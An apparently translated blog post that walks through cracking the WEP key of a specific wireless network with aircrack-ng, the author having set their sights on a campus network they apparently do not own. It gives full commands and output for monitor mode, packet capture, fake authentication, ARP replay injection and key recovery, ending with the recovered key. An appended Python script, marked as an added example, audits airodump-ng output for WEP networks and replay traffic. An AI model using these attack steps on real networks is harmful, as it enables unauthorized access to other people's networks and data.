The company has no wireless network, so ever since I got an E63 I have had my eye on the campus wireless. Searching online, the most popular tool on Linux is aircrack-ng, which is very good and very powerful.
I read an example given by Fu Kai-san, but his attack method differs from the one I used. The official site has plenty of material; below is a memo of the process, for reference only; malicious practice is not recommended.
The machine used is a modified EEEPC running Ubuntu 8.10, with aircrack-ng already installed as a prerequisite (easy to get with apt-get).
1. Put the wireless card into monitor mode
gladstone@gladstone-eeepc:~$ sudo airmon-ng start wlan0
2. Find the target AP (Access Point)
gladstone@gladstone-eeepc:~$ sudo airodump-ng mon0
A list of the available wireless networks appears. Here the target router's BSSID is 00:B0:0C:02:A7:DE, and ifconfig shows this machine's MAC address is 00:15:af:a6:c8:d7.
3. Start collecting data
gladstone@gladstone-eeepc:~$ sudo airodump-ng -c 1 --bssid 00:B0:0C:02:A7:DE -w out-ag mon0
Note the parameters:
-c is the channel the target AP is on, here 1
--bssid takes the target AP's MAC address
-w is the prefix for the output file; setting it to out-ag means the actual output file will be out-ag-01.cap
Console output:
CH 1 ][ Elapsed: 4 mins ][ 2009-06-03 09:55 ][ fixed channel mon0: 7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:B0:0C:02:A7:DE 155 12 1033 19059 19 1 54 WEP WEP OPN wanrongtouzi
BSSID STATION PWR Rate Lost Packets Probes
00:B0:0C:02:A7:DE 00:B0:C6:00:46:1F 163 18- 2 0 24 wanrongtouzi
00:B0:0C:02:A7:DE 00:15:AF:A6:C8:D7 0 0- 0 157795 88998
Note: do not close this terminal; it must stay open for the whole cracking process to keep collecting data.
4. Start the attack
The attack uses the aireplay-ng tool; the attack method is selected by a parameter (see aireplay-ng --help for details). Fu Kai-san used chopchop; here ARP replay is used.
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
At first I ran into a problem here; the console showed the following:
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
This problem is described in detail on the official wiki: http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
The solution is to authenticate first, before running the command above:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -1 0 -a 00:B0:0C:02:A7:DE -e wanrongtouzi -h 00:15:af:a6:c8:d7 mon0
09:51:26 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
09:51:28 Sending Authentication Request (Open System)
09:51:28 Authentication successful
09:51:28 Sending Association Request
09:51:33 Sending Authentication Request (Open System)
09:51:33 Authentication successful
09:51:33 Sending Association Request
09:51:33 Association successful :-) (AID: 1)
Then restart the attack:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
09:52:00 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
Saving ARP requests in replay_arp-0603-095200.cap
You should also start airodump-ng to capture replies.
^Cad 108414 packets (got 56293 ARP requests and 44578 ACKs), sent 50832 packets...(499 pps)
After this step, just wait: the packet count rises quickly. In the other console (airodump-ng) you can watch the number of injected packets climbing, with the #/s figure reaching around 30 (this is not quantitative; the official figure is that it can reach several hundred, and when I tried at home it peaked at 80, possibly depending on machine speed).
5. Crack the key from the collected data
After about 2 minutes you can try cracking with aircrack-ng; as mentioned above, all the captured packets are in the out-ag-01.cap file.
gladstone@gladstone-eeepc:~$ sudo aircrack-ng out-ag-01.cap
Opening out-ag-01.cap
Read 94019 packets.
# BSSID ESSID Encryption
1 00:B0:0C:02:A7:DE wanrongtouzi WEP (17803 IVs)
Choosing first network as target.
Opening out-ag-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 17887 ivs.
Aircrack-ng 1.0 rc1
[00:00:17] Tested 1425601 keys (got 17823 IVs)
KB depth byte(vote)
0 4/ 8 AA(23296) 39(23040) 4E(23040) CE(22784) 0F(22272) 50(22272) 25(22016) 75(22016) 81(22016) E4(22016)
1 0/ 5 BB(25088) 78(24064) 5D(23808) 8D(23808) 3A(23296) BD(23040) 68(22784) 8C(22784) 3F(22528) A5(22528)
2 6/ 8 A1(23296) 31(23040) 4F(23040) C8(23040) D5(23040) DC(22784) 2D(22528) 78(22528) 3D(22272) 5B(22272)
3 0/ 10 DD(23808) 12(23296) A8(23040) C0(23040) 1F(22528) 25(22528) DB(22272) F3(22272) 00(22272) 56(22272)
4 0/ 1 FF(31488) E5(24320) 29(23552) 3C(23552) 40(23552) 49(23296) F8(23296) 47(23040) 60(23040) C1(23040)
KEY FOUND! [ AA:BB:CC:DD:FF ]
Decrypted correctly: 100%
The key came out without trouble; it really was set to something simple = _ =.
The above is only simple WEP cracking; the time needed varies with the complexity of the key. WPA seems much harder to crack; I will try it next time.
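As an added example that is not part of the original post, here is a small Python audit a network owner can run over the airodump-ng console table shown in step 3: it flags APs still on WEP or open authentication, and stations whose frame volume matches the ARP replay injection described in step 4 (the attacker's own station shows 88998 frames against 24 for the legitimate client). The sample table is constructed from the figures in the post; the 10,000-frame threshold is an assumption.

```python
import re
from typing import NamedTuple

# Constructed sample mirroring the airodump-ng console table in the post
SAMPLE = """\
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:B0:0C:02:A7:DE 155 12 1033 19059 19 1 54 WEP WEP OPN wanrongtouzi
BSSID STATION PWR Rate Lost Packets Probes
00:B0:0C:02:A7:DE 00:B0:C6:00:46:1F 163 18- 2 0 24 wanrongtouzi
00:B0:0C:02:A7:DE 00:15:AF:A6:C8:D7 0 0- 0 157795 88998
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
# AP row: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AP_RE = re.compile(
    rf"^(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+"
    rf"(?P<data>\d+)\s+(?P<dps>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\S+)\s+"
    rf"(?P<enc>\S+)\s+(?P<cipher>\S+)\s+(?P<auth>\S+)\s*(?P<essid>.*)$")
# Station row: BSSID STATION PWR Rate(rx- tx) Lost Packets Probes
STA_RE = re.compile(
    rf"^(?P<bssid>{MAC})\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)\s+"
    rf"(?P<rx>\d+)-\s*(?P<tx>\d+)\s+(?P<lost>\d+)\s+(?P<packets>\d+)\s*(?P<probes>.*)$")


class AccessPoint(NamedTuple):
    bssid: str
    essid: str
    enc: str
    auth: str
    beacons: int
    data: int


class Station(NamedTuple):
    bssid: str
    station: str
    lost: int
    packets: int


def parse_airodump(table: str):
    """Split the console table into AP rows and station rows; header lines are skipped."""
    aps, stations = [], []
    for line in table.splitlines():
        if m := STA_RE.match(line):
            stations.append(Station(m["bssid"], m["station"], int(m["lost"]), int(m["packets"])))
        elif m := AP_RE.match(line):
            aps.append(AccessPoint(m["bssid"], m["essid"].strip(), m["enc"], m["auth"],
                                   int(m["beacons"]), int(m["data"])))
    return aps, stations


def audit(table: str, packet_threshold: int = 10_000):
    """Return (kind, mac, detail) findings: WEP/open APs and stations with replay-sized frame counts."""
    aps, stations = parse_airodump(table)
    findings = []
    for ap in aps:
        if ap.enc in ("WEP", "OPN"):  # WEP is broken (PTW needs only tens of thousands of IVs)
            findings.append(("weak-encryption", ap.bssid, f"{ap.essid}: {ap.enc}/{ap.auth}; move to WPA2-AES or WPA3"))
    for sta in stations:
        if sta.packets >= packet_threshold:  # assumed threshold; one client sent 88998 frames in the post
            findings.append(("replay-volume", sta.station, f"{sta.packets} frames to {sta.bssid}, {sta.lost} lost"))
    return findings
```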